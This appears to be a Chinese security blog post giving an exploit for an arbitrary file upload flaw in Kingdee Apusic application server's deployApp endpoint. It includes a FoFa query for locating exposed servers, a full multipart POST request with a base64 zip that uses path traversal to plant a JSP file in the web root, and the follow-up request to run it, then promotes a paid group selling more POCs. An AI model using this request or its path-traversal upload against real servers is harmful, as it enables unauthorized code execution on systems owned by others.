正文

金蝶 Apusic deployApp 任意文件上传

admin
admin V管理员 /0 评论 /271 阅读
1228
此篇文章发布距今已超过331天,您需要注意文章的内容或图片是否可用!

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!


00

漏洞概述

金蝶 Apusic 应用服务器,在部署APP服务器的 deployApp接口存在任意文件上传漏洞,可上传部署脚本文件至服务器。

01

空间搜索语法

FoFa

app="Apusic应用服务器"

02

利用过程

登录页面如下

注意:需要提前准备如下zip文件,用一次就需要换一次appName,以及jsp名称。

jsp内容如下:

<%out.println("hello");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>

上传数据包如下:

注意:利用此数据包时,需要将base64内容解码后利用,否则会部署失败。

POST /admin//protect/application/deployApp HTTP/1.1Host:  User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 1536Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryd9acIBdVuqKWDJbd
------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="appName"
1d7As------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="deployInServer"
false------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="clientFile"; filename="1d7As.zip"Content-Type: application/x-zip-compressed
base64_decode(UEsDBBQAAAAIAEn9/VdTcP0QXAAAAGYAAAA5AAAALi4vLi4vLi4vLi4vYXBwbGljYXRpb25zL2RlZmF1bHQvcHVibGljX2h0bWwvYXNqdXFhc3AuanNwHf1NCv0wDAYrDP39bHIB/Vn9Wv0EQT80Ev1a/V7f/Xv9Ov25aHT9/f1h/SpqIv39Iv39Jv39IUim/f39/RP9/VgrPv39df39/f0o/f39JiIecQv9/f13AVBLAQI/ABQAAAAIAEn9/VdTcP0QXAAAAGYAAAA5ACQAAAAAAAAAIAAAAAAAAAAuLi8uLi8uLi8uLi9hcHBsaWNhdGlvbnMvZGVmYXVsdC9wdWJsaWNfaHRtbC9hc2p1cWFzcC5qc3AKACAAAAAAAAEAGAD9Hf39/TL9AQAAAAAAAAAAAAAAAAAAAABQSwUGAAAAAAEAAQD9AAAA/QAAAAAA)------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="archivePath"

------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="baseContext"

------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="startType"
auto------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="loadon"

------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="virtualHost"

------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="allowHosts"

------WebKitFormBoundaryd9acIBdVuqKWDJbdContent-Disposition: form-data; name="denyHosts"

------WebKitFormBoundaryd9acIBdVuqKWDJbd--

访问上传文件路径如下:

GET /asjuqasp.jsp HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36Connection: closeAccept-Encoding: gzip, deflate, br

03

nuclei poc

获取脚本关注本公众号后发送:Apusic1

04

双旦福利

考虑到团队运营成本和公众号福利发放,创建知识星球欢迎各位师傅打赏💰后期会用打赏的资金去做福利。星球的性价比真的比较可观,绝对不会因为某些身外之物水文章,安全圈很小,主要是和师傅们交个朋友。还请各位师傅监督团队后边的表现,将心比心!


进入星球你能直接收获到:

  1. 优先于公众号的POC更新(提前一两周~~

  2. 定制化的成品工具开发

  3. 私人定制的客户需求(要求不要太过分呦~~)

  4. 实战技巧、攻防思路

  5. 杂七杂八的技术小福利

  6. 根据能力不定期的星球内部抽奖

  7. 更多漏洞利用Tips


给各位师傅呈上券~

进入星球直接能学习到这些漏洞:

关注我们


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下